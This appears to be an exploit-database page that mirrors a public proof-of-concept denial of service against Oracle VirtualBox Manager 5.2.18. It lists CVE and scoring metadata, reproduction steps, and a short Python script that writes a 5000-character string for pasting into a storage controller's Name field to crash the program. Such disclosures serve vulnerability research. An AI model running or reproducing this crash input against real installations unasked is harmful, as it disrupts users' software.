Advertisement






Oracle VirtualBox Manager 5.2.18 r124319 Name Attribute Denial of Service

CVE Category Price Severity
CVE-2018-2698 CWE-20 $5,000 - $10,000 High
Author Risk Exploitation Type Date
Anonymous High Local 2018-09-17
CPE
cpe:cpe:/a:oracle:virtualbox:5.2.18
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.4436 0.985599

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090150

Below is a copy:

Oracle VirtualBox Manager 5.2.18 r124319 Name Attribute Denial of Service
# Exploit Title: Oracle VirtualBox Manager 5.2.18 r124319  - 'Name Attribute' Denial of Service (PoC)
# Discovery by: Jose Eduardo Castro
# Discovery Date: 2018-09-14
# Vendor Homepage: https://www.virtualbox.org/
# Software Link: https://download.virtualbox.org/virtualbox/5.2.18/VirtualBox-5.2.18-124319-Win.exe
# Tested Version: 5.2.18 r124319
# Tested on OS  : Windows 7 Ultimate x64 es
 
#!/usr/bin/env python
#-*-coding: utf-8-*-
# Steps to Produce the DoS: 
# 1.- Run python code : python vb_dos.py
# 2.- Open string.txt and copy content to clipboard
# 3.- Open VM VirtualBox Manager
# 4.- Select a created virtual machine in mode "power off" and select "Settings"
# 5.- Select "Storage" button
# 6.- Select option "Adds new storage controller" and select any controller
# 7.- Paste ClipBoard on "Name"
# 8.- Clic OK
# 9.- DoS
 
import socket, os, sys
 
buffer = "\x41" * 5000
 
f = open ("string.txt", "w")
f.write(buffer)
f.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum